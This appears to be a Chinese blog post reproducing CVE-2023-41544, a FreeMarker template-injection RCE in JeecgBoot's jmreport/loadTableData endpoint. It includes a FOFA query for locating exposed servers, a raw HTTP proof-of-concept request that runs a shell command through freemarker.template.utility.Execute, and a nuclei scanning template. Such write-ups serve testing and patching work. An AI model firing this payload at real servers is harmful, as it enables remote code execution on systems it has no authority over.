JeecgBoot jmreport/loadTableData RCE漏洞复现

最新推荐文章于 2024-05-23 18:39:28 发布
最新推荐文章于 2024-05-23 18:39:28 发布
阅读量813 收藏 9
点赞数 4
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136025263
版权

JeecgBoot jmreport/loadTableData RCE漏洞复现

1.漏洞介绍

Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息

2.漏洞编号
CVECNVDCNNVD
CVE-2023-41544--

3.影响范围
名称版本号
-3.4.0<=org.jeecgframework.boot:jeecg-boot-common<3.5.3

4.检索特征

FOFA:title==“JeecgBoot 企业级低代码平台” || body=“window._CONFIG[‘imgDomainURL’] = 'http://localhost:8080/jeecg-boot/” || title=“Jeecg-Boot 企业级快速开发平台” || title=“Jeecg 快速开发平台” || body=“‘http://fileview.jeecg.com/onlinePreview’” || title==“JeecgBoot 企业级低代码平台” || title==“Jeecg-Boot 企业级快速开发平台” || title==“JeecgBoot 企业级快速开发平台” || title==“JeecgBoot 企业级快速开发平台” || title=“Jeecg 快速开发平台” || title=“Jeecg-Boot 快速开发平台” || body=“积木报表” || body=“jmreport”
在这里插入图片描述

5.POC

POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
Connection: close
 
{"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"echo 8888888888\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}

在这里插入图片描述

nuclei检测


id: JeecgBoot-loadTableData-RCE

info:
  name: Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞 攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息
  author: test
  severity: high
  metadata: 
    fofa-query: title=="JeecgBoot 企业级低代码平台" || body="window._CONFIG['imgDomainURL'] = 'http://localhost:8080/jeecg-boot/" || title="Jeecg-Boot 企业级快速开发平台" || title="Jeecg 快速开发平台" || body="'http://fileview.jeecg.com/onlinePreview'" || title=="JeecgBoot 企业级低代码平台" || title=="Jeecg-Boot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title=="JeecgBoot 企业级快速开发平台" || title="Jeecg 快速开发平台" || title="Jeecg-Boot 快速开发平台" || body="积木报表" || body="jmreport"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /jeecg-boot/jmreport/loadTableData HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
        Accept: application/json, text/plain, */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Content-Type: application/json;charset=UTF-8
        Connection: close
        
        {"dbSource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?new()>${value(\"echo 8888888888\")}'","tableName":"test_demo);","pageNo":1,"pageSize":10}


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"8888888888")

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 1825
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
JeecgBoot jmreport/loadTableData RCE漏洞复现(CVE-2023-41544)
0xSec
01-31 989
JeecgBootjmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
Goby漏洞更新 jeecg-boot 未授权SQL注入漏洞(CVE-2024-1454)
2401_84247760的博客
04-12 440
感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
web漏洞-Jeecg-Boot存在未授权访问
热门推荐
qq_35578446的博客
03-15 1万+
一、介绍 Jeecg-Boot是一款基于BPM的低代码平台,零代码开发!采用前后端分离架构: SpringBoot 2.x,Ant Design&Vue,Mybatis-plus,Shiro,JWT。强大的代码生成器让前后端代码一键生成,无需写任何代码!!帮助Java项目解决70%的重复工作,让开发更关注业务逻辑,既能快速提高效率,节省研发成本,同时又不失灵活性!同时具备更强大的低代码能力:Online表单、Online报表、Online图表、表单设计、流程设计、报表设计、大屏设计 等等...
jeecg信息泄露+文件上传=》RCE
公众号shadow sock7
03-19 4554
创建jeecg数据库,然后执行命令: create database /jeecg; source /Users/xxx/repos/jeecg-master/docs/jeecg_3.8_mysql.sql
IEN在Web3.0中的性能与安全优势
qq_29268247的博客
05-17 427
通过分布式架构、区块链技术和智能数据管理,IEN不仅提高数据传输效率和处理速度,还大幅增强网络安全性和稳定性。通过命名数据网络,IEN实现了高效的数据分发和缓存机制,减少了数据传输路径,提高了网络吞吐量。对比实验表明,IEN在处理并发请求时的延迟减少了40%,传输速率提高了30%。实验结果显示,面对突发流量时,IEN的吞吐量稳定性提高了35%,有效避免了网络拥塞。实验数据显示,IEN的加密机制将数据泄露事件减少了70%,大幅提升了数据隐私保护水平。IEN整合区块链技术,提供去中心化的信任机制。
软考高级架构师:软件系统安全相关概念完整性、不可否认性、可控性、机密性、安全审计
明明如月的技术博客
05-19 216
了解软件系统安全的几个重要概念:完整性、不可否认性、可控性、机密性和安全审计,可以通过一些日常生活中的例子来帮助理解。
怎样使用安全组?
2301_78491269的博客
05-23 196
目前,VPC 类型实例的数量上限是 2000,对所有 VPC 类型实例的安全组都生效。需要注意的是,上限 2000 指的是所有实例包含的私网 IP 个数(主网卡和辅助网卡共享此配额),而不是实例个数。说明:目前,一个实例中的每个弹性网卡默认最多可以加入 5 个安全组,所以一个实例的每个弹性网卡最多可以包含 500 条安全组规则,能够满足绝大多数场景的需求。不可以,每个安全组最多可以包含 100 条安全组规则。如果不存在冗余规则,请拆分安全组。每个安全组的入站规则与出站规则的总数不能超过 100。
【软考中级 软件设计师】计算机网络和安全
最新发布
shaozheng0503的博客
05-23 597
蠕虫病毒,作为一种高度自足的恶意软件,其核心特征在于其自我复制与传播能力,无需借助其他程序或人为操作即可在计算机网络中迅速蔓延。这类病毒利用操作系统或应用程序的安全漏洞,通过网络连接自动寻找新的宿主进行感染,其传播机制通常包括但不限于电子邮件、网络共享、即时消息等渠道。例如,“红色代码”病毒便是通过HTTP服务器的漏洞传播,而“爱虫病毒”则是通过电子邮件附件进行扩散,两者均展现了蠕虫病毒通过网络自我复制的特性。相比之下,“冰河”则被归类为远程控制木马(Trojan Horse),其运作模式与蠕虫截然不同。
安全警钟】APP如何筑起坚不可摧的防御,抵御黑客攻击?
NSME1的博客
05-20 442
做好安全防御
【Linux安全】Firewalld防火墙基础
weixin_62922268的博客
05-23 248
支持网络区域所定义的网络链接以及接口安全等级的动态防火墙管理工具支持IPv4、IPv6防火墙设置以及以太网桥支持服务或应用程序直接添加防火墙规则接口拥有两种配置模式运行时配置永久配置trusted(信任区域):允许所有的传入流量。public(公共区域):允许与ssh或dhcpv6-client预定义服务匹配的传入流量,其余均拒绝。是新添加网络接口的默认区域。external(外部区域):允许与 ssh 预定义服务匹配的传入流量,其余均拒绝。
什么样的数据摆渡设备,可以满足不同网间数据的安全传输需求?
文件数据安全交换
05-23 238
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。专业的跨网文件交换平台:比如飞驰云联《Ftrans Ferry跨网文件安全交换系统》:提供企业文件交换、病毒查杀、文件内容检测、审核审批、权限管控、日志审计等功能,实现安全、高效、可靠、便捷的文件交换。同时支持会签、或签,支持转审,可设置抄送人。
等保测评-安全通信网络与安全区域边界
2403_84237550的博客
05-23 472
等保测评,全称为网络安全等级保护测评,是中国网络安全领域的一项重要工作,旨在通过标准化的测评流程,确保信息系统的安全等级保护措施符合国家相关标准。在等保测评中,"安全通信网络"与"安全区域边界"是两个关键的测评领域。
【Linux安全】Firewalld防火墙
F12138X的博客
05-23 853
欲穷千里目,更上一层楼
分享 | 如何提升金融业务效率的同时保障身份认证安全和用户体验(二)
trusfort的博客
05-20 357
提升身份认证安全性,保证交易安全
url=“http://192.168.43.172:8080/jeecg-boot/orderfood/buffet/updatecode?code=+data
05-09
这是一个 HTTP 请求的 URL,其中包含了参数 code 和它的值 data。这个 URL 的作用是向 192.168.43.172:8080 这个地址发送一个 POST 请求,请求的路径是 /jeecg-boot/orderfood/buffet/updatecode,同时附带了一个名为 code 的参数,值为 data

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值